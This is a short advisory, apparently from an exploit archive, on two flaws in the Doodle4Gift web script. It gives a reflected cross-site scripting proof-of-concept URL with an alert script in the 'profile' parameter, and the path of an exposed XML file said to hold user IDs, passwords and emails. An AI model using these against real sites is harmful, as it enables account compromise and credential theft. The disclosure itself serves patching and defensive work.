Doodle4Gift <= Multiple Vulnerabilities

2014.01.21

Credit: Dr.NaNo

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title : Doodle4Gift <= Multiple Vulnerabilities
# Author : Dr.NaNo
# Date : H-1435/3/18 - 2014/1/19
# Software Link : http://www.hotscripts.com/listing/doodle4gift/
# Software Link2: https://sites.google.com/site/doodle4gift/
#
#
# (1) Cross Site Scripting (XSS):
#
#
# http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
#
# http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
#
#
#
# (2) information disclosure:
#
#
# http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
#
#
#
# A special gift for: (P0c Team),(V4-Team):

References:

https://sites.google.com/site/doodle4gift/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Doodle4Gift <= Multiple Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.